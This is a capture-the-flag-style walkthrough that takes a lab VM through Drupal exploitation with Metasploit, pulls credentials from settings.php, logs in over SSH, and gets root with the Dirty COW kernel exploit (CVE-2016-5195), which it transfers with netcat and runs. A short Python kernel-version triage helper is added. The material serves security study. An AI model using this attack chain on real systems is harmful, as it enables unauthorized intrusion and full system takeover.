Introduction
Vulnerability number: CVE-2016-5195
Vulnerability name: Dirty COW privilege escalation
Vulnerability hazard: a low-privileged user can use this vulnerability to achieve local privilege escalation on all versions of Linux systems and obtain root privileges.
Scope of impact: Linux kernel >= 2.6.22 (released in 2007) has been affected since then; the issue was not fixed until October 18, 2016.
Link: target range (lab VM) download address, extraction code
Link: privilege escalation file download address, extraction code zp3j
Information gathering
ifconfig
#Check the local IP address.
nmap -sP 192.168.152.0/24
#Scan the network segment and find the address of the target range.
nmap -A 192.168.152.129 -p 0-65535
#Scan the ports.
Open http://[ip]:1898 in a browser. If the page appears, the target range has started successfully.
dirb <website address>
#Scan the directories. Then check robots.txt to see whether it reveals anything exploitable.
The website exposes Drupal version information. We use msfconsole to check whether there are exploitable vulnerabilities for that version.
Vulnerability reproduction
msfconsole
#Search for exploitable vulnerabilities
search drupal
#List the matching modules
use 1
#Select the module with serial number 1
show options
#View the options that need to be set; use set to set them
set RHOSTS <target range address>
set RPORT <target range port>
run
#Run the module and exploit the vulnerability
shell
#Interact with the target
python -c 'import pty; pty.spawn("/bin/bash")'
#Use Python to spawn an interactive shell
cat settings.php
#View the file contents and obtain the database account and password
cd /home
#Enter the /home directory and view the existing accounts
Connect via SSH with account tiago, password Virgulino, on port 22. The connection succeeds.
id
#View the current user information
uname -a
#View the kernel version of the target machine
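As an added example (not part of the original walkthrough), a small Python triage helper that parses `uname -r` output and flags kernels that fall inside the affected range stated above (>= 2.6.22), so that an inventory of hosts can be sorted into "verify the vendor patch level" and "outside the range". The host names and versions in it are constructed.

```python
import re

# Lower bound of the affected range stated on the page: Linux kernel >= 2.6.22.
AFFECTED_FROM = (2, 6, 22)


def parse_kernel_version(uname_r: str) -> tuple:
    """Extract (major, minor, patch) from a `uname -r` string such as
    '4.4.0-31-generic' or '2.6.32-642.el6.x86_64'."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel version: {uname_r!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def in_affected_range(uname_r: str) -> bool:
    """True when the kernel is at or above 2.6.22, i.e. inside the range the
    page gives as affected. True means "confirm the distribution's patch
    level", not "definitely vulnerable": distributions backported the fix
    without changing the upstream version number."""
    return parse_kernel_version(uname_r) >= AFFECTED_FROM


def triage(hosts: dict) -> dict:
    """Map host name -> 'check-patch-level' or 'outside-range'."""
    return {
        host: ("check-patch-level" if in_affected_range(ver) else "outside-range")
        for host, ver in hosts.items()
    }


# Constructed sample inventory (hypothetical host names and kernel strings).
SAMPLE_HOSTS = {
    "web01": "4.4.0-31-generic",
    "db01": "2.6.32-642.el6.x86_64",
    "legacy01": "2.6.18-398.el5",
}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_HOSTS).items():
        print(f"{host}: {verdict}")
```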
Dirty COW privilege escalation
Script link: download address of the privilege escalation file, extraction code zp3j
On Kali:
tar -czvf aa.tar.gz CVE-2016-5195-master
#Compress the exploit directory. The archive is named aa.tar.gz and needs to be transferred to the target machine to perform the privilege escalation.
On the target machine, listen on port 4444 and write the received data to aa.tar.gz:
nc -l 4444 > aa.tar.gz
On Kali, send the aa.tar.gz file to the target machine:
nc 192.168.152.129 4444 < aa.tar.gz
On the target machine, decompress the transferred archive:
tar -xzvf aa.tar.gz
#Enter the CVE-2016-5195-master directory
cd CVE-2016-5195-master
make
#A new file, dcow, appears
./dcow
#The root password is now dirtyCowFun
su
#Enter the password; the privilege escalation succeeds.